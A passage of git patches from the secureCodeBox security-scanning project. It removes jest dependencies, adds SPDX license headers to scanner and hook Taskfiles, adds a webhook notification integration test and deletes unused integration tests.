-6095,131 +978,6 @@ "requires": { "is-number": "^7.0.0" } - }, - "type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true - }, - "type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true - }, - "update-browserslist-db": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.11.tgz", - "integrity": "sha512-dCwEFf0/oT85M1fHBg4F0jtLwJrutGoHSQXCh7u4o2t1drG+c0a9Flnqww6XUKSfQMPpJBRjU8d4RXB09qtvaA==", - "dev": true, - "requires": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - } - }, - "v8-to-istanbul": { - "version": "9.1.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.1.0.tgz", - "integrity": "sha512-6z3GW9x8G1gd+JIIgQQQxXuiJtCXeAjp6RaPEPLv62mH3iPHPxV6W3robxtCzNErRo6ZwTmzWhsbNvjyEBKzKA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "requires": { - "makeerror": "1.0.12" - } - }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "requires": { - "isexe": "^2.0.0" - } - }, - "wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - }, - "y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true - }, - "yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "requires": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - } - }, - "yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true - }, - "yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true } } } diff --git a/hooks/update-field-hook/hook/package.json b/hooks/update-field-hook/hook/package.json index 580c565c2a..a90702da44 100644 --- a/hooks/update-field-hook/hook/package.json +++ b/hooks/update-field-hook/hook/package.json @@ -8,9 +8,7 @@ "url": "git+https://github.com/secureCodeBox/secureCodeBox.git" }, "main": "hook.js", - "scripts": { - "test": "jest --verbose --ci --colors --coverage --passWithNoTests" - }, + "scripts": {}, "keywords": [ "secureCodeBox", "security", @@ -36,10 +34,9 @@ }, "license": "Apache-2.0", "dependencies": { - "lodash.set": "^4.3.2" + "lodash-es": "^4.17.21" }, "devDependencies": { - "@types/jest": "^29.4.0", - "jest": "^29.3.1" + "@types/jest": "^30.0.0" } } From bd959b42daad468e670136ae972dd9123c5ce44c Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Thu, 10 Jul 2025 16:33:36 +0200 Subject: [PATCH 115/137] Add copyright header to all taskfiles --- Taskfile.yaml | 4 ++++ demo-targets/Taskfile.yaml | 4 ++++ hooks/Taskfile.yaml | 4 ++++ hooks/cascading-scans/Taskfile.yaml | 4 ++++ hooks/finding-post-processing/Taskfile.yaml | 4 ++++ hooks/generic-webhook/Taskfile.yaml | 4 ++++ hooks/notification/Taskfile.yaml | 4 ++++ hooks/persistence-azure-monitor/Taskfile.yaml | 4 ++++ hooks/persistence-defectdojo/Taskfile.yaml | 4 ++++ hooks/persistence-dependencytrack/Taskfile.yaml | 4 ++++ hooks/persistence-elastic/Taskfile.yaml | 4 ++++ hooks/update-field-hook/Taskfile.yaml | 4 ++++ scanners/Taskfile.yaml | 4 ++++ scanners/amass/Taskfile.yaml | 4 ++++ scanners/cmseek/Taskfile.yaml | 4 ++++ scanners/ffuf/Taskfile.yaml | 4 ++++ scanners/git-repo-scanner/Taskfile.yaml | 4 ++++ scanners/gitleaks/Taskfile.yaml | 4 ++++ scanners/kube-hunter/Taskfile.yaml | 4 ++++ scanners/ncrack/Taskfile.yaml | 4 ++++ scanners/nikto/Taskfile.yaml | 4 ++++ scanners/nmap/Taskfile.yaml | 4 ++++ scanners/nuclei/Taskfile.yaml | 4 ++++ scanners/screenshooter/Taskfile.yaml | 4 ++++ scanners/semgrep/Taskfile.yaml | 4 ++++ scanners/ssh-audit/Taskfile.yaml | 4 ++++ scanners/sslyze/Taskfile.yaml | 4 ++++ scanners/test-scan/Taskfile.yaml | 4 ++++ scanners/trivy-sbom/Taskfile.yaml | 4 ++++ scanners/trivy/Taskfile.yaml | 4 ++++ scanners/whatweb/Taskfile.yaml | 4 ++++ scanners/wpscan/Taskfile.yaml | 4 ++++ scanners/zap-automation-framework/Taskfile.yaml | 4 ++++ 33 files changed, 132 insertions(+) diff --git a/Taskfile.yaml b/Taskfile.yaml index 6830baf376..2a44547edd 100644 --- a/Taskfile.yaml +++ b/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" env: diff --git a/demo-targets/Taskfile.yaml b/demo-targets/Taskfile.yaml index 1983dbb440..0a9e663caf 100644 --- a/demo-targets/Taskfile.yaml +++ b/demo-targets/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" tasks: diff --git a/hooks/Taskfile.yaml b/hooks/Taskfile.yaml index 6308977df0..beeaaf0ff7 100644 --- a/hooks/Taskfile.yaml +++ b/hooks/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/hooks/cascading-scans/Taskfile.yaml b/hooks/cascading-scans/Taskfile.yaml index 2993f216e1..88526ebea3 100644 --- a/hooks/cascading-scans/Taskfile.yaml +++ b/hooks/cascading-scans/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/hooks/finding-post-processing/Taskfile.yaml b/hooks/finding-post-processing/Taskfile.yaml index 00079c286b..0b9ec63d4f 100644 --- a/hooks/finding-post-processing/Taskfile.yaml +++ b/hooks/finding-post-processing/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/hooks/generic-webhook/Taskfile.yaml b/hooks/generic-webhook/Taskfile.yaml index ed64638a3b..f1868c9675 100644 --- a/hooks/generic-webhook/Taskfile.yaml +++ b/hooks/generic-webhook/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/hooks/notification/Taskfile.yaml b/hooks/notification/Taskfile.yaml index d5bff70c30..5e7b9654ed 100644 --- a/hooks/notification/Taskfile.yaml +++ b/hooks/notification/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/hooks/persistence-azure-monitor/Taskfile.yaml b/hooks/persistence-azure-monitor/Taskfile.yaml index e1a1e6cf1c..654f1653ef 100644 --- a/hooks/persistence-azure-monitor/Taskfile.yaml +++ b/hooks/persistence-azure-monitor/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/hooks/persistence-defectdojo/Taskfile.yaml b/hooks/persistence-defectdojo/Taskfile.yaml index 132c0b6387..599ee9f758 100644 --- a/hooks/persistence-defectdojo/Taskfile.yaml +++ b/hooks/persistence-defectdojo/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/hooks/persistence-dependencytrack/Taskfile.yaml b/hooks/persistence-dependencytrack/Taskfile.yaml index e3bfce49f2..bd5409dd74 100644 --- a/hooks/persistence-dependencytrack/Taskfile.yaml +++ b/hooks/persistence-dependencytrack/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/hooks/persistence-elastic/Taskfile.yaml b/hooks/persistence-elastic/Taskfile.yaml index 7cec3312b6..e74cd9eb28 100644 --- a/hooks/persistence-elastic/Taskfile.yaml +++ b/hooks/persistence-elastic/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/hooks/update-field-hook/Taskfile.yaml b/hooks/update-field-hook/Taskfile.yaml index 44003dc9e5..8544832206 100644 --- a/hooks/update-field-hook/Taskfile.yaml +++ b/hooks/update-field-hook/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/scanners/Taskfile.yaml b/scanners/Taskfile.yaml index 4dda53827d..da4102e606 100644 --- a/scanners/Taskfile.yaml +++ b/scanners/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/scanners/amass/Taskfile.yaml b/scanners/amass/Taskfile.yaml index fe71ba1385..37e84d28ee 100644 --- a/scanners/amass/Taskfile.yaml +++ b/scanners/amass/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/scanners/cmseek/Taskfile.yaml b/scanners/cmseek/Taskfile.yaml index bab4ffd486..36562f153f 100644 --- a/scanners/cmseek/Taskfile.yaml +++ b/scanners/cmseek/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/scanners/ffuf/Taskfile.yaml b/scanners/ffuf/Taskfile.yaml index 1f6917ee8b..1900012ba0 100644 --- a/scanners/ffuf/Taskfile.yaml +++ b/scanners/ffuf/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/scanners/git-repo-scanner/Taskfile.yaml b/scanners/git-repo-scanner/Taskfile.yaml index f220ae374a..e58f01d4b6 100644 --- a/scanners/git-repo-scanner/Taskfile.yaml +++ b/scanners/git-repo-scanner/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/scanners/gitleaks/Taskfile.yaml b/scanners/gitleaks/Taskfile.yaml index f54b9ba475..7d33d75991 100644 --- a/scanners/gitleaks/Taskfile.yaml +++ b/scanners/gitleaks/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/scanners/kube-hunter/Taskfile.yaml b/scanners/kube-hunter/Taskfile.yaml index 8ce73164eb..e009ffdde2 100644 --- a/scanners/kube-hunter/Taskfile.yaml +++ b/scanners/kube-hunter/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/scanners/ncrack/Taskfile.yaml b/scanners/ncrack/Taskfile.yaml index f6ccf5f792..eec456a8c9 100644 --- a/scanners/ncrack/Taskfile.yaml +++ b/scanners/ncrack/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/scanners/nikto/Taskfile.yaml b/scanners/nikto/Taskfile.yaml index 2444e2ee95..8987310e36 100644 --- a/scanners/nikto/Taskfile.yaml +++ b/scanners/nikto/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/scanners/nmap/Taskfile.yaml b/scanners/nmap/Taskfile.yaml index ff0096deb3..bf57337c2a 100644 --- a/scanners/nmap/Taskfile.yaml +++ b/scanners/nmap/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/scanners/nuclei/Taskfile.yaml b/scanners/nuclei/Taskfile.yaml index 47ceba96ea..249f04c32f 100644 --- a/scanners/nuclei/Taskfile.yaml +++ b/scanners/nuclei/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/scanners/screenshooter/Taskfile.yaml b/scanners/screenshooter/Taskfile.yaml index 5c4c5ea30c..2f3270bd44 100644 --- a/scanners/screenshooter/Taskfile.yaml +++ b/scanners/screenshooter/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/scanners/semgrep/Taskfile.yaml b/scanners/semgrep/Taskfile.yaml index b267fed1d2..560d7b1dec 100644 --- a/scanners/semgrep/Taskfile.yaml +++ b/scanners/semgrep/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/scanners/ssh-audit/Taskfile.yaml b/scanners/ssh-audit/Taskfile.yaml index bc1b410104..423323fed1 100644 --- a/scanners/ssh-audit/Taskfile.yaml +++ b/scanners/ssh-audit/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/scanners/sslyze/Taskfile.yaml b/scanners/sslyze/Taskfile.yaml index b8e20928f8..7f2021f045 100644 --- a/scanners/sslyze/Taskfile.yaml +++ b/scanners/sslyze/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/scanners/test-scan/Taskfile.yaml b/scanners/test-scan/Taskfile.yaml index 9c38b8b7fc..94836e9c0b 100644 --- a/scanners/test-scan/Taskfile.yaml +++ b/scanners/test-scan/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/scanners/trivy-sbom/Taskfile.yaml b/scanners/trivy-sbom/Taskfile.yaml index e8a0759784..6d04aa8066 100644 --- a/scanners/trivy-sbom/Taskfile.yaml +++ b/scanners/trivy-sbom/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/scanners/trivy/Taskfile.yaml b/scanners/trivy/Taskfile.yaml index bf35f38d12..d35279a620 100644 --- a/scanners/trivy/Taskfile.yaml +++ b/scanners/trivy/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/scanners/whatweb/Taskfile.yaml b/scanners/whatweb/Taskfile.yaml index 153a094fc5..efdee5d23c 100644 --- a/scanners/whatweb/Taskfile.yaml +++ b/scanners/whatweb/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/scanners/wpscan/Taskfile.yaml b/scanners/wpscan/Taskfile.yaml index 6f71a66869..393c483381 100644 --- a/scanners/wpscan/Taskfile.yaml +++ b/scanners/wpscan/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: diff --git a/scanners/zap-automation-framework/Taskfile.yaml b/scanners/zap-automation-framework/Taskfile.yaml index b0adedb79b..5c62e34305 100644 --- a/scanners/zap-automation-framework/Taskfile.yaml +++ b/scanners/zap-automation-framework/Taskfile.yaml @@ -1,3 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + version: "3" includes: From b5f3082c94fc75c339de0a7d5a26177f43a7a0b1 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Thu, 10 Jul 2025 18:29:07 +0200 Subject: [PATCH 116/137] Don't ignore notification test test file --- hooks/notification/.gitignore | 1 + .../integration-tests/notification.test.js | 84 +++++++++++++++++++ 2 files changed, 85 insertions(+) create mode 100644 hooks/notification/integration-tests/notification.test.js diff --git a/hooks/notification/.gitignore b/hooks/notification/.gitignore index 2da4a04c77..eaf5ea35df 100644 --- a/hooks/notification/.gitignore +++ b/hooks/notification/.gitignore @@ -4,5 +4,6 @@ node_modules **.js +!integration-tests/*.js **.js.map *.tar diff --git a/hooks/notification/integration-tests/notification.test.js b/hooks/notification/integration-tests/notification.test.js new file mode 100644 index 0000000000..a3a40f7811 --- /dev/null +++ b/hooks/notification/integration-tests/notification.test.js @@ -0,0 +1,84 @@ +// SPDX-FileCopyrightText: the secureCodeBox authors +// +// SPDX-License-Identifier: Apache-2.0 + +import { scan, getKubernetesAPIs } from "../../../tests/integration"; + +test( + "should trigger notification", + async () => { + await scan( + "test-scan-notification-web-hook", + "test-scan", + ["placeholder"], + 90, + ); + + const WEBHOOK = "http-webhook"; + const NAMESPACE = "demo-targets"; + + const { k8sPodsApi } = getKubernetesAPIs(); + + function containsPod(item) { + return item.metadata.name.includes(WEBHOOK); + } + + let podName; + await k8sPodsApi + .listNamespacedPod({ + namespace: NAMESPACE, + }) + .then((res) => { + let podArray = res.items.filter(containsPod); + if (podArray.length === 0) { + throw new Error(`Did not find Pod for "${WEBHOOK}" Hook`); + } + + podName = podArray[0].metadata.name; + }); + + const containerName = WEBHOOK; + + const params = { + podName, + namespace: NAMESPACE, + containerName, + }; + const result = await delayedRepeat(isHookTriggered, params, 1000, 10); + + expect(result).toBe(true); + }, + 3 * 60 * 1000, +); + +async function isHookTriggered(params) { + console.log("Fetch Container Logs..."); + const { k8sPodsApi } = getKubernetesAPIs(); + let containerLog = await k8sPodsApi.readNamespacedPodLog({ + name: params.podName, + namespace: params.namespace, + container: params.containerName, + }); + return containerLog.includes("/slack-notification"); +} + +const sleep = (durationInMs) => + new Promise((resolve) => setTimeout(resolve, durationInMs)); + +async function delayedRepeat( + fun, + functionParamObject, + intervalInMs, + maxRetries, +) { + for (let i = 0; i < maxRetries; i++) { + const condition = await fun(functionParamObject); + if (condition) { + return condition; + } + + await sleep(intervalInMs); + } + + throw new Error("Reached max retries"); +} From 2573063980197aeb08dbd2b0f8290f62894ad458 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Thu, 10 Jul 2025 18:31:19 +0200 Subject: [PATCH 117/137] Remove long unused integration tests They aren't integrated in ci and the setup for them is unclear :/ They haven't run in over 3 years and apparently nobody misses them. All these scenarios are already covered by some of our normal hooks so these were always more basic tests. --- .../generic/findings-validation.test.js | 20 ----- .../generic/no-scan-definition-error.test.js | 24 ------ .../generic/read-only-hook.test.js | 82 ------------------- .../generic/read-write-hook.test.js | 34 -------- tests/integration/package.json | 7 +- 5 files changed, 1 insertion(+), 166 deletions(-) delete mode 100644 tests/integration/generic/findings-validation.test.js delete mode 100644 tests/integration/generic/no-scan-definition-error.test.js delete mode 100644 tests/integration/generic/read-only-hook.test.js delete mode 100644 tests/integration/generic/read-write-hook.test.js diff --git a/tests/integration/generic/findings-validation.test.js b/tests/integration/generic/findings-validation.test.js deleted file mode 100644 index cd3f70f2a5..0000000000 --- a/tests/integration/generic/findings-validation.test.js +++ /dev/null @@ -1,20 +0,0 @@ -// SPDX-FileCopyrightText: the secureCodeBox authors -// -// SPDX-License-Identifier: Apache-2.0 - -const { scan } = require("../helpers"); - -jest.retryTimes(3); - -test( - "Parser must fail on invalid findings", - async () => { - await expect( - // passing hello-world as args, as at least one parameter is required - scan("invalid-findings-test-scan", "test-scan", ["hello-world"], 90), - ).rejects.toThrow( - `Scan failed with description "Failed to run the Parser. This is likely a Bug, we would like to know about. Please open up a Issue on GitHub."`, - ); - }, - 3 * 60 * 1000, -); diff --git a/tests/integration/generic/no-scan-definition-error.test.js b/tests/integration/generic/no-scan-definition-error.test.js deleted file mode 100644 index fff3570165..0000000000 --- a/tests/integration/generic/no-scan-definition-error.test.js +++ /dev/null @@ -1,24 +0,0 @@ -// SPDX-FileCopyrightText: the secureCodeBox authors -// -// SPDX-License-Identifier: Apache-2.0 - -const { scan } = require("../helpers"); - -jest.retryTimes(3); - -test( - "scan without a matching ScanType should be marked as errored", - async () => { - await expect( - scan( - "scan-type-not-found", - "this-type-does-not-exists", - ["hello-world"], - 30, - ), - ).rejects.toThrow( - `Scan failed with description "Configured ScanType 'this-type-does-not-exists' not found in 'integration-tests' namespace. You'll likely need to deploy the ScanType."`, - ); - }, - 1 * 60 * 1000, -); diff --git a/tests/integration/generic/read-only-hook.test.js b/tests/integration/generic/read-only-hook.test.js deleted file mode 100644 index 2554341681..0000000000 --- a/tests/integration/generic/read-only-hook.test.js +++ /dev/null @@ -1,82 +0,0 @@ -// SPDX-FileCopyrightText: the secureCodeBox authors -// -// SPDX-License-Identifier: Apache-2.0 - -const { scan } = require("../helpers"); -const k8s = require("@kubernetes/client-node"); - -jest.retryTimes(3); - -test( - "should trigger a webhook", - async () => { - await scan("test-scan-read-only-hook", "test-scan", ["hello-world"], 90); - - const WEBHOOK = "http-webhook"; - const NAMESPACE = "integration-tests"; - - const kc = new k8s.KubeConfig(); - kc.loadFromDefault(); - - const k8sApi = kc.makeApiClient(k8s.CoreV1Api); - - function containsPod(item) { - return item.metadata.name.includes(WEBHOOK); - } - - let podName; - await k8sApi.listNamespacedPod(NAMESPACE, "true").then((res) => { - let podArray = res.body.items.filter(containsPod); - if (podArray.length === 0) { - throw new Error(`Did not find Pod for "${WEBHOOK}" Hook`); - } - - podName = podArray[0].metadata.name; - }); - - const containerName = WEBHOOK; - - const params = { - k8sApi, - podName, - namespace: NAMESPACE, - containerName, - }; - const result = await delayedRepeat(isHookTriggered, params, 1000, 10); - - expect(result).toBe(true); - }, - 3 * 60 * 1000, -); - -async function isHookTriggered(params) { - console.log("Fetch Container Logs..."); - let containerLog = await params.k8sApi.readNamespacedPodLog( - params.podName, - params.namespace, - params.containerName, - false, - ); - return containerLog.body.includes("/hallo-welt"); -} - -const sleep = (durationInMs) => - new Promise((resolve) => setTimeout(resolve, durationInMs)); - -async function delayedRepeat( - fun, - functionParamObject, - intervalInMs, - maxRetries, -) { - for (let i = 0; i < maxRetries; i++) { - const condition = await fun(functionParamObject); - if (condition) { - return condition; - } - - await sleep(intervalInMs); - } - - throw new Error("Reached max retries"); -} diff --git a/tests/integration/generic/read-write-hook.test.js b/tests/integration/generic/read-write-hook.test.js deleted file mode 100644 index d3275ffbc3..0000000000 --- a/tests/integration/generic/read-write-hook.test.js +++ /dev/null @@ -1,34 +0,0 @@ -// SPDX-FileCopyrightText: the secureCodeBox authors -// -// SPDX-License-Identifier: Apache-2.0 - -const { scan } = require("../helpers"); - -jest.retryTimes(3); - -test( - "localhost port scan should only find a host finding", - async () => { - const { categories, severities, count } = await scan( - "test-scan-read-write-hook", - "test-scan", - ["hello-world"], - 90, - ); - - expect(count).toBe(2); - expect(categories).toMatchInlineSnapshot(` - Object { - "Host": 1, - "Open Port": 1, - "fancy-category": 2, - } - `); - expect(severities).toMatchInlineSnapshot(` - Object { - "high": 2, - } - `); - }, - 3 * 60 * 1000, -); diff --git a/tests/integration/package.json b/tests/integration/package.json index 8ac5689d6b..db13930f68 100644 --- a/tests/integration/package.json +++ b/tests/integration/package.json @@ -4,19 +4,14 @@ "description": "Integration Tests running on a real k8s cluster", "main": "helpers", "scripts": { - "test:integration": "jest --verbose --ci --colors --coverage --passWithNoTests", "test:helpers": "bun test helpers.test.js" }, "keywords": [], "author": "iteratec GmbH", "license": "Apache-2.0", "devDependencies": { - "jest": "^29.7.0", - "prettier": "^3.6.0", "@kubernetes/client-node": "^1.3.0", - "@securecodebox/parser-sdk-nodejs": "file:../../parser-sdk/nodejs", - "@types/jest": "^29.5.14", - "ts-jest": "^29.2.5" + "@securecodebox/parser-sdk-nodejs": "file:../../parser-sdk/nodejs" }, "dependencies": {} } \ No newline at end of file From fc2cd9f96ad3820d5fcb3f973fe345ceed0aa82e Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Thu, 10 Jul 2025 18:34:29 +0200 Subject: [PATCH 118/137] Replace jest test with a kubectl call This was just testing if the secret is there, overkill to do that in js. kubectl get secret will fail if no resource exists with that name --- .../kubernetes/pull-secret-extractor/Makefile | 2 +- .../integration-test/package-lock.json | 10363 ---------------- .../package-lock.json.license | 3 - .../integration-test/package.json | 18 - .../integration-test/package.json.license | 3 - .../pull-secret-extraction.test.js | 26 - 6 files changed, 1 insertion(+), 10414 deletions(-) delete mode 100644 auto-discovery/kubernetes/pull-secret-extractor/integration-test/package-lock.json delete mode 100644 auto-discovery/kubernetes/pull-secret-extractor/integration-test/package-lock.json.license delete mode 100644 auto-discovery/kubernetes/pull-secret-extractor/integration-test/package.json delete mode 100644 auto-discovery/kubernetes/pull-secret-extractor/integration-test/package.json.license delete mode 100644 